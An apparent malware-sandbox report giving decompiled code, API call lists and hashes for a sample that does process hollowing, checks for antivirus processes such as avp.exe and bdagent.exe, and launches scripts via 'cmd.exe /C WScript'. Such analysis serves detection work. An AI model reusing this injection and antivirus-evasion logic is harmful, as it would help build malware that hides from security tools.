				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E035D1BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x35dc038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x35dc074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x35dc038)) - 0x4550;
					_t6 = _t62 + 0x35dc038; // 0x3b92f8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x35dc038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E035D1670( &_v112, 0, 0x44);
						E035D1670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x37a1bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x37a1bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t72 = GetThreadContext(_v16,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E035D72C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E035D74D0(_t82,  &_v36, _v20, _t82, _t123, 0x35dc038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x3b92f923
													_t90 = E035D74D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E035D71A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E035D1BB0(_t133, 0, 0x138);
																	E035D74D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x3b92f91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E035D74D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x35dc038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E035D7120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E035D1CE0("0125789244697858", 0x10, 0x35dc038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x35dc038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}





































                                                                                                                                          0x035d5b80
                                                                                                                                          0x035d5b98
                                                                                                                                          0x035d5ba2
                                                                                                                                          0x035d5ba9
                                                                                                                                          0x035d5bac
                                                                                                                                          0x035d5bb3
                                                                                                                                          0x035d5bbd
                                                                                                                                          0x035d5bc4
                                                                                                                                          0x035d5bef
                                                                                                                                          0x035d5bef
                                                                                                                                          0x035d5bf4
                                                                                                                                          0x035d5bff
                                                                                                                                          0x035d5bff
                                                                                                                                          0x035d5c05
                                                                                                                                          0x035d5e53
                                                                                                                                          0x035d5e54
                                                                                                                                          0x035d5e5a
                                                                                                                                          0x035d5c0b
                                                                                                                                          0x035d5c13
                                                                                                                                          0x035d5c20
                                                                                                                                          0x035d5c28
                                                                                                                                          0x035d5c2f
                                                                                                                                          0x035d5c39
                                                                                                                                          0x035d5c3d
                                                                                                                                          0x035d5c3e
                                                                                                                                          0x035d5c40
                                                                                                                                          0x035d5c42
                                                                                                                                          0x035d5c4b
                                                                                                                                          0x035d5c44
                                                                                                                                          0x035d5c44
                                                                                                                                          0x035d5c44
                                                                                                                                          0x035d5c58
                                                                                                                                          0x035d5c5e
                                                                                                                                          0x035d5c60
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5c66
                                                                                                                                          0x035d5c66
                                                                                                                                          0x035d5c71
                                                                                                                                          0x035d5c77
                                                                                                                                          0x035d5c79
                                                                                                                                          0x035d5e2f
                                                                                                                                          0x035d5e34
                                                                                                                                          0x035d5e43
                                                                                                                                          0x035d5e48
                                                                                                                                          0x035d5e4c
                                                                                                                                          0x035d5e52
                                                                                                                                          0x035d5c7f
                                                                                                                                          0x035d5c96
                                                                                                                                          0x035d5c9c
                                                                                                                                          0x035d5c9e
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5ca4
                                                                                                                                          0x035d5ca4
                                                                                                                                          0x035d5ca7
                                                                                                                                          0x035d5caa
                                                                                                                                          0x035d5cac
                                                                                                                                          0x035d5cca
                                                                                                                                          0x035d5cdc
                                                                                                                                          0x035d5ce1
                                                                                                                                          0x035d5ce3
                                                                                                                                          0x035d5ce6
                                                                                                                                          0x035d5ce8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5cee
                                                                                                                                          0x035d5cee
                                                                                                                                          0x035d5cf3
                                                                                                                                          0x035d5cf6
                                                                                                                                          0x035d5cfd
                                                                                                                                          0x035d5d0a
                                                                                                                                          0x035d5d0f
                                                                                                                                          0x035d5d11
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d17
                                                                                                                                          0x035d5d17
                                                                                                                                          0x035d5d1d
                                                                                                                                          0x035d5d1f
                                                                                                                                          0x035d5d23
                                                                                                                                          0x035d5d65
                                                                                                                                          0x035d5d6b
                                                                                                                                          0x035d5d7e
                                                                                                                                          0x035d5d83
                                                                                                                                          0x035d5d85
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d8b
                                                                                                                                          0x035d5d90
                                                                                                                                          0x035d5da0
                                                                                                                                          0x035d5da6
                                                                                                                                          0x035d5da8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5dae
                                                                                                                                          0x035d5db1
                                                                                                                                          0x035d5db6
                                                                                                                                          0x035d5db8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5dba
                                                                                                                                          0x035d5dbf
                                                                                                                                          0x035d5dd9
                                                                                                                                          0x035d5ddb
                                                                                                                                          0x035d5ddd
                                                                                                                                          0x035d5de7
                                                                                                                                          0x035d5e02
                                                                                                                                          0x035d5e0f
                                                                                                                                          0x035d5e0f
                                                                                                                                          0x035d5e1e
                                                                                                                                          0x035d5e23
                                                                                                                                          0x035d5e2e
                                                                                                                                          0x035d5e2e
                                                                                                                                          0x035d5db8
                                                                                                                                          0x035d5da8
                                                                                                                                          0x035d5d25
                                                                                                                                          0x035d5d25
                                                                                                                                          0x035d5d28
                                                                                                                                          0x035d5d2a
                                                                                                                                          0x035d5d30
                                                                                                                                          0x035d5d49
                                                                                                                                          0x035d5d4e
                                                                                                                                          0x035d5d50
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d5a
                                                                                                                                          0x035d5d5b
                                                                                                                                          0x035d5d5e
                                                                                                                                          0x035d5d60
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d62
                                                                                                                                          0x035d5d62
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d62
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d60
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5d30
                                                                                                                                          0x035d5d23
                                                                                                                                          0x035d5d11
                                                                                                                                          0x035d5cae
                                                                                                                                          0x035d5cb3
                                                                                                                                          0x035d5cb5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5cb7
                                                                                                                                          0x035d5cc2
                                                                                                                                          0x035d5cc4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5cc4
                                                                                                                                          0x035d5cb5
                                                                                                                                          0x035d5cac
                                                                                                                                          0x035d5c9e
                                                                                                                                          0x035d5c79
                                                                                                                                          0x035d5c60
                                                                                                                                          0x035d5bc6
                                                                                                                                          0x035d5bd7
                                                                                                                                          0x035d5bdc
                                                                                                                                          0x035d5bdf
                                                                                                                                          0x035d5be6
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5be8
                                                                                                                                          0x035d5bee
                                                                                                                                          0x035d5bee
                                                                                                                                          0x035d5be6
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,035D49E6), ref: 035D5C58
                                                                                                                                          • GetThreadContext.KERNEL32(035D49E6,00010007,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C71
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,035D49E6,?,?,?), ref: 035D5C96
                                                                                                                                          • SetThreadContext.KERNEL32(035D49E6,00010007,?,?,00000000,3B92F923,00000004,00000000,?,00000000,?,035DC038,?,00000000,?,?), ref: 035D5DA0
                                                                                                                                          • Sleep.KERNEL32(00001388,035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DBF
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5DD3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D49E6,00000000,00000138,?,?,00003000,00000040), ref: 035D5E0F
                                                                                                                                          • CloseHandle.KERNEL32(035D49E6,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E1E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D5E23
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                                                          • String ID: 0125789244697858$D
                                                                                                                                          • API String ID: 1428767187-3232960292
                                                                                                                                          • Opcode ID: 9543e199f6e44f50aa3ba570154a7207dd70827ac43bb2a805951c71ca218f66
                                                                                                                                          • Instruction ID: a3a2ea857b36cc834f28e6140c57afe8b851cad414b540b3f778e1104b4bbb16
                                                                                                                                          • Opcode Fuzzy Hash: 9543e199f6e44f50aa3ba570154a7207dd70827ac43bb2a805951c71ca218f66
                                                                                                                                          • Instruction Fuzzy Hash: 4481A471A41219ABEB31EB98FC45FEEB7B8FB04700F040555FA04FA1A0E771A954DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D6A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E035D6A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E035D1BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E035D1BB0( &_v740, 0, 0x288);
				E035D1670( &_v740, 0, 0x288);
				_t74 = _a4;
				E035D1A00( &_v612, _a4);
				_t38 = E035D7ED0(_a4);
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E035D8DD0() == 0) {
					L22:
					E035D1BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E035D1A00( &_v1780, L"cmd.exe /C WScript \"");
					E035D1970( &_v1780, _t74);
					E035D1970( &_v1780, "\"");
					_t48 = E035D7ED0(_t74);
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E035D7EF0("bdagent.exe");
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x37a1314 == 0) {
						_push(0);
						_t48 = E035D29E0( &_v740, 0x35d0000, E035D80E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E035D6CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E035D80E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E035D29E0(_t71, 0x35d0000, _t75,  &_v740, 0x288,  &_v8, E035D6CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E035D7EF0("vsserv.exe");
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E035D7EF0("cfp.exe");
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E035D7EF0("ccavsrv.exe");
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E035D7EF0("cmdagent.exe");
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E035D7EF0("avp.exe");
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E035D7EF0("avpui.exe");
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E035D7EF0("ksde.exe");
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}
































                                                                                                                                          0x035d6a40
                                                                                                                                          0x035d6a58
                                                                                                                                          0x035d6a68
                                                                                                                                          0x035d6a72
                                                                                                                                          0x035d6a85
                                                                                                                                          0x035d6a8a
                                                                                                                                          0x035d6a95
                                                                                                                                          0x035d6a9b
                                                                                                                                          0x035d6aa0
                                                                                                                                          0x035d6aa5
                                                                                                                                          0x035d6c9a
                                                                                                                                          0x035d6c9a
                                                                                                                                          0x035d6aab
                                                                                                                                          0x035d6aac
                                                                                                                                          0x035d6ab4
                                                                                                                                          0x035d6c0e
                                                                                                                                          0x035d6c16
                                                                                                                                          0x035d6c21
                                                                                                                                          0x035d6c2a
                                                                                                                                          0x035d6c2e
                                                                                                                                          0x035d6c3b
                                                                                                                                          0x035d6c4c
                                                                                                                                          0x035d6c52
                                                                                                                                          0x035d6c5c
                                                                                                                                          0x035d6c7e
                                                                                                                                          0x035d6c8d
                                                                                                                                          0x035d6c92
                                                                                                                                          0x035d6c92
                                                                                                                                          0x035d6c94
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6c95
                                                                                                                                          0x035d6abf
                                                                                                                                          0x035d6ac4
                                                                                                                                          0x035d6ac9
                                                                                                                                          0x035d6b46
                                                                                                                                          0x035d6b53
                                                                                                                                          0x035d6b58
                                                                                                                                          0x035d6b59
                                                                                                                                          0x035d6bd6
                                                                                                                                          0x035d6bf8
                                                                                                                                          0x035d6bfd
                                                                                                                                          0x035d6c02
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6c02
                                                                                                                                          0x035d6b5b
                                                                                                                                          0x035d6b62
                                                                                                                                          0x035d6b64
                                                                                                                                          0x035d6b69
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b6f
                                                                                                                                          0x035d6b73
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b80
                                                                                                                                          0x035d6b88
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b8a
                                                                                                                                          0x035d6b99
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6bb6
                                                                                                                                          0x035d6bbb
                                                                                                                                          0x035d6bc0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6bcc
                                                                                                                                          0x035d6bcc
                                                                                                                                          0x035d6bcd
                                                                                                                                          0x035d6bd1
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6bd1
                                                                                                                                          0x035d6ad0
                                                                                                                                          0x035d6ad5
                                                                                                                                          0x035d6ada
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6ae1
                                                                                                                                          0x035d6ae6
                                                                                                                                          0x035d6aeb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6af2
                                                                                                                                          0x035d6af7
                                                                                                                                          0x035d6afc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b03
                                                                                                                                          0x035d6b08
                                                                                                                                          0x035d6b0d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b14
                                                                                                                                          0x035d6b19
                                                                                                                                          0x035d6b1e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b25
                                                                                                                                          0x035d6b2a
                                                                                                                                          0x035d6b2f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6b36
                                                                                                                                          0x035d6b3b
                                                                                                                                          0x035d6b40
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7ED0: GetFileAttributesW.KERNEL32(?,?,035D31D3,035D47C4,035D47C4,\System32\wuapp.exe,035D47C4,?,00000000), ref: 035D7ED6
                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 035D6B91
                                                                                                                                            • Part of subcall function 035D7EF0: Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 035D7F24
                                                                                                                                            • Part of subcall function 035D7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 035D7F48
                                                                                                                                            • Part of subcall function 035D7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 035D7F6D
                                                                                                                                            • Part of subcall function 035D7EF0: CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 035D7F77
                                                                                                                                            • Part of subcall function 035D7EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 035D7F86
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D6C7E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 035D6C8D
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 035D6C92
                                                                                                                                            • Part of subcall function 035D7EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 035D7F08
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandle$Process32$CreateNextProcess$AttributesCurrentFileFirstSnapshotToolhelp32
                                                                                                                                          • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                                                          • API String ID: 3996573972-1880040858
                                                                                                                                          • Opcode ID: 27af93bd5e61f00db006e703fb7d4df77feecb59699833732f46214026641d8a
                                                                                                                                          • Instruction ID: babfa19424439c2c8d4636593aff1a34d0799f62794e6324282ac2c169fc5aec
                                                                                                                                          • Opcode Fuzzy Hash: 27af93bd5e61f00db006e703fb7d4df77feecb59699833732f46214026641d8a
                                                                                                                                          • Instruction Fuzzy Hash: 0E51BE75D803066AFB30EBA8BD45FAFB27DBB44784F880064E904A50B1F771E646C6A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D5E60, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 300sleepprocessmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                          			E035D5E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E035D1BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E035D1CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E035D1E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E035D1670( &_v132, 0, 0x44);
						E035D1670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x37a1bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??);
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E035D61F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372);
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E035D6250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24);
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E035D72C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E035D74D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E035D73C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E035D74D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E035D7230(0, _t176, _v36,  &_v1372) == 0 || E035D71A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388);
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4);
															_v24 = _t132;
															if(_t132 != 0) {
																E035D1BB0(_t132, 0, 0x138);
																E035D74D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000);
															}
															CloseHandle(_v36);
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E035D74D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E035D6300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E035D73C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E035D7120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
